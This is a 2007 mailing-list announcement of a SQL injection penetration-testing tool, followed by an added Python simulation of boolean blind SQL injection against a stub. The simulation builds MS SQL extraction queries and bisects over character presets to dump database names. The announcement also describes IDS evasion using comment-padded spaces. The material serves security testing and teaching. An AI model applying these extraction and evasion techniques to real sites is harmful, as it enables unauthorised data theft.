Official release of SQL Power Injector 1.2

From: Francois Larouche (francois.larouche-ml@sqlpowerinjector.com)
Date: Mon Jul 16 2007 - 14:08:51 EDT


Greetings list,

I have the pleasure to announce that a new version of SQL Power Injector
is now officially available on my web site:

www.sqlpowerinjector.com

This time, like the last version, I emphasized maturity, stability and
reliability. I also emphasized usability, documentation and innovation.

One of the major improvements is an innovative way to optimize and
accelerate the dichotomy in blind SQL injection, saving up to 25% of the
time/number of requests.

In addition, it is now possible to define a range list that will replace
a variable (<<@>>) inside a blind SQL injection string and automatically
play the values for you. That means, for example, that you can get all
the database names from the sysdatabases table in MS SQL without having
to input the dbid each time.

Another great time saver is a new Firefox plugin that launches SQL Power
Injector with all the information of the current web page, including its
session context. No more time wasted copying and pasting the session
cookies after you log in... And of course you can do the easy SQL tests
in your browser and use the plugin once you want to search more
thoroughly.

To make your life easier there is now a new feature that finds the
differences between a positive condition (1=1) response and a negative
condition (1=2) response and displays the list for you.

The last major addition is the extensive database Help file (chm) that
contains most of the information you need when you SQL inject. It covers
the 5 DBMSs supported by SQL Power Injector. In it you can find the
system tables and views with their columns, environment variables, useful
functions and stored procedures, all with notes on how to use them and
why they are useful for SQL injection.

But of course, there is more than that, as you will see in the list of
new features.

* Now supports the DB2 database
* Can create/edit ASCII character presets in order to optimize the number
of requests/speed of blind SQL injection
* Can make the blind SQL injection case insensitive (useful with
character presets)
* New feature that finds the differences between the response page of a
positive answer and that of a negative one
* Created a Firefox plugin that launches SQL Power Injector with all the
current page context (string parameters and cookies)
* Created extensive documentation to be used as a database "aide-mémoire"
that contains information related to SQL injection for each supported
DBMS (system tables (with their column names and descriptions),
environment and session variables, functions, dangerous stored procs,
etc.)
* Can create a range list that will replace the variable (<<@>>) inside
a blind SQL injection string and automatically play the values for you
* Automatic replay of a variable range with a predefined list from a
text file
* New management console for Cookies used for the Load Page process
* Detect and add Cookies used during the Load Page process (Set-Cookie
detection)
* Improved the User Interface to display contextual information (normal
vs blind mode)
* A new Datagrid has been added with the Cookies information, which can
be injected in the same fashion as the String Parameters
* Improved the accuracy and reliability of the blind SQL injection
results (if a character cannot be found it is replaced by the sun char (¤))
* Can edit the Referer
* View source now displays HTML in colors and can be customized in an
XML file
* Can search in the View source
* Can choose a User-Agent from the menu (and even add new ones in the
XML file)
* Threads are better managed and it is now possible to raise their
number to the one you wish (50 max in the application, but this can be
changed in the source code)
* Can configure the application settings
* Supports configurable proxies
* With SQL Server it is possible to use the TOP keyword
* Takes into account the different syntax of MySQL 4.1.0 and lower
versus higher versions in the database list
* Various things redesigned and quality improvements
* Two integrated tools: Hex and Char encoder and MS SQL @options
interpreter
* Fixed problems when there is a Form tag inside another one (Bug fix)
* Fixed a bug with multiple threads and cookies (Bug fix)

For those who don't know what SQL Power Injector is, here are some
details about the application (more can be found on the web site):

INTRODUCTION
============

SQL Power Injector is a graphical application created in .Net 1.1 that
helps the penetration tester inject SQL commands into a web page.

For now it is SQL Server, Oracle and MySQL compliant, but it is possible
to use it with any existing DBMS when using the inline injection (Normal
mode).

Moreover, this application gets all the parameters you need to test for
SQL injection, either by the GET or POST method, thus avoiding the need
to use several applications or a proxy to intercept the data.

FEATURES
========

* Supported on Windows, Unix and Linux operating systems
* SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant
* SSL support
* Automatically loads the parameters from a form or an IFrame on a web
page (GET or POST)
* Detect and browse the framesets
* Option that auto detects the language of the web site
* Detect and add cookies used during the Load Page process (Set-Cookie
detection)
* Find automatically the submit page(s) with its method (GET or POST)
displayed in a different color
* Can create/modify/delete loaded string and cookies parameters directly
in the Datagrids
* Single SQL injection
* Blind SQL injection
   - Comparison of true and false responses of the page or results in
the cookie
   - Time delay
* Response of the SQL injection in a customized browser
* Can view the HTML code source of the returned page in HTML contextual
colors and search in it
* Fine tuning of parameter and cookie injection
* Can parameterize the length and count of the expected result to
optimize the time taken by the application to execute the SQL injection
* Create/edit ASCII character presets in order to optimize the number of
requests/speed of blind SQL injection
* Multithreading (configurable up to 50)
* Option to replace spaces with empty comments (/**/) to evade IDS or
filter detection
* Automatically encode special characters before sending them
* Automatically detect predefined SQL errors in the response page
* Automatically detect a predefined word or sentence in the response page
* Real time result
* Save and load sessions in an XML file
* Feature that automatically finds the differences between the response
page of a positive answer and that of a negative one
* Can create a range list that will replace the variable (<<@>>) inside
a blind SQL injection string and automatically play the values for you
* Automatic replay of a variable range with a predefined list from a
text file
* Firefox plugin that launches SQL Power Injector with all the
information of the current web page, including its session context
(parameters and cookies)
* Two integrated tools: Hex and Char encoder and MS SQL @options
interpreter
* Can edit the Referer
* Can choose a User-Agent (or even create one in the User-Agent XML file)
* Can configure the application with the settings window
* Supports configurable proxies

SUMMARY OF THE DIFFERENCES WITH THE OTHER EXISTING TOOLS
========================================================

* Web page string and cookie parameters auto detection
* Fine tuning of parameter SQL injection
* Time delay feature
* Multithread feature
* Response results in a customized browser
* Automated positive and negative condition discovery
* Blind SQL injection characters preset optimizer

LICENSE
=======

Clarified Artistic License

Cheers!

Francois Larouche
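The announcement describes the blind SQL injection techniques in prose only, so the following is an added example, not code from SQL Power Injector or its author, that simulates three of them in Python against an in-process stub: diffing the 1=1 and 1=2 responses to find a stable "true" marker, bisecting over a character preset (optionally case-insensitive) instead of the full 7-bit ASCII range with the ¤ placeholder for characters the preset cannot represent, and replaying a <<@>> range variable to enumerate sysdatabases by dbid. The target page, the sysdatabases contents, the page layout and the names StubTarget, extract, replay_range and dump are all constructed for the example; the stub only evaluates the exact predicate shapes the example builds and is not a SQL engine.

```python
import re
import string

# Constructed stand-in for MS SQL's master..sysdatabases (dbid -> name); dbid 6 is absent.
SYSDATABASES = {1: "master", 2: "tempdb", 3: "model", 4: "msdb", 5: "Customer_DB9"}
# Subquery with the tool's <<@>> range variable in place of the dbid.
SUBQUERY = "(SELECT name FROM master..sysdatabases WHERE dbid=<<@>>)"
NOT_FOUND = "\u00a4"   # placeholder emitted when a character is not in the preset


class StubTarget:
    """Stand-in for the vulnerable page: the injected predicate is ANDed into a WHERE
    clause and only the true/false shape of the response is observable. It evaluates
    just the predicate shapes built below; it is not a SQL engine (constructed)."""
    _CHAR = re.compile(
        r"ASCII\((LOWER\()?SUBSTRING\(\(SELECT name FROM master\.\.sysdatabases "
        r"WHERE dbid=(\d+)\),(\d+),1\)\)?\)([>=])(\d+)")

    def __init__(self):
        self.requests = 0

    def _truth(self, predicate):
        if predicate in ("1=1", "1=2"):
            return predicate == "1=1"
        m = self._CHAR.fullmatch(predicate)
        if m is None:
            raise ValueError("unsupported predicate: " + predicate)
        lower, dbid, pos, op, val = m.groups()
        name = SYSDATABASES.get(int(dbid), "")   # missing row behaves like NULL
        if int(pos) > len(name):   # SUBSTRING past the end is '', ASCII('') is NULL,
            return False           # and a comparison with NULL is never true
        ch = name[int(pos) - 1].lower() if lower else name[int(pos) - 1]
        return ord(ch) > int(val) if op == ">" else ord(ch) == int(val)

    def get(self, predicate):
        """Response body for '... WHERE id=17 AND <predicate>' (constructed layout)."""
        self.requests += 1
        lines = ["<html><body>", f"<!-- served request {self.requests} -->"]  # volatile
        lines += (["<h1>Product 17</h1>", "<p>In stock: 42</p>"] if self._truth(predicate)
                  else ["<p>No product found.</p>"])
        return "\n".join(lines + ["</body></html>"])


def find_true_marker(target):
    """Diff of the 1=1 and 1=2 responses. Lines present in two separate 1=1 responses
    and absent from the 1=2 response are kept, which drops volatile content (counters,
    timestamps) that a single diff would wrongly list as a difference."""
    true1 = target.get("1=1").splitlines()
    true2 = set(target.get("1=1").splitlines())
    false = set(target.get("1=2").splitlines())
    return [ln for ln in true1 if ln in true2 and ln not in false]


def char_predicate(subquery, pos, op, value, case_insensitive):
    """Injected predicate asking about one character of the subquery's result."""
    expr = f"SUBSTRING({subquery},{pos},1)"
    if case_insensitive:
        expr = f"LOWER({expr})"          # compare against a lowercase preset
    return f"ASCII({expr}){op}{value}"


def make_preset(chars):
    """Candidate characters in ASCII order. Index 0 is a NUL sentinel: past the end of
    the string ASCII() is NULL, every '>' question answers false, and the bisection
    lands on index 0, which extract() reads as end of string."""
    return ["\0"] + sorted(set(chars) - {"\0"})


FULL_ASCII = make_preset(chr(c) for c in range(1, 128))                   # 7 questions/char
LOWER_ALNUM = make_preset(string.ascii_lowercase + string.digits + "_")  # 5-6 questions/char


def extract(oracle, subquery, preset, case_insensitive=False):
    """Boolean-based blind extraction, one character at a time, bisecting over the
    preset. One extra equality request confirms the candidate; if it fails, the real
    character is outside the preset and NOT_FOUND is substituted instead."""
    out, pos = [], 1
    while True:
        lo, hi = 0, len(preset) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(char_predicate(subquery, pos, ">", ord(preset[mid]), case_insensitive)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                      # sentinel reached: NULL, i.e. end of string
            return "".join(out)
        ch = preset[lo]
        if not oracle(char_predicate(subquery, pos, "=", ord(ch), case_insensitive)):
            ch = NOT_FOUND
        out.append(ch)
        pos += 1


def replay_range(oracle, template, values, preset, case_insensitive=False):
    """The <<@>> range feature: substitute each value into the template and extract."""
    return {v: extract(oracle, template.replace("<<@>>", str(v)), preset, case_insensitive)
            for v in values}


def dump(preset, values=range(1, 7), case_insensitive=False):
    """Run the whole procedure against a fresh stub; return (names by dbid, requests)."""
    target = StubTarget()
    marker = find_true_marker(target)[0]

    def oracle(predicate):
        return marker in target.get(predicate)

    return replay_range(oracle, SUBQUERY, values, preset, case_insensitive), target.requests
```

Calling dump(FULL_ASCII), dump(LOWER_ALNUM) and dump(LOWER_ALNUM, case_insensitive=True) shows the three behaviours side by side: the full-range run recovers every name including "Customer_DB9" at a fixed 8 requests per character (7 bisection questions plus the confirmation), the case-sensitive run with the lowercase preset returns "¤ustomer_¤¤9" because the uppercase letters fail the confirmation request, and the case-insensitive run returns "customer_db9" in fewer requests than the full-range run. The missing dbid 6 comes back as an empty string because the subquery yields NULL, which the sentinel at index 0 detects without any extra request.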
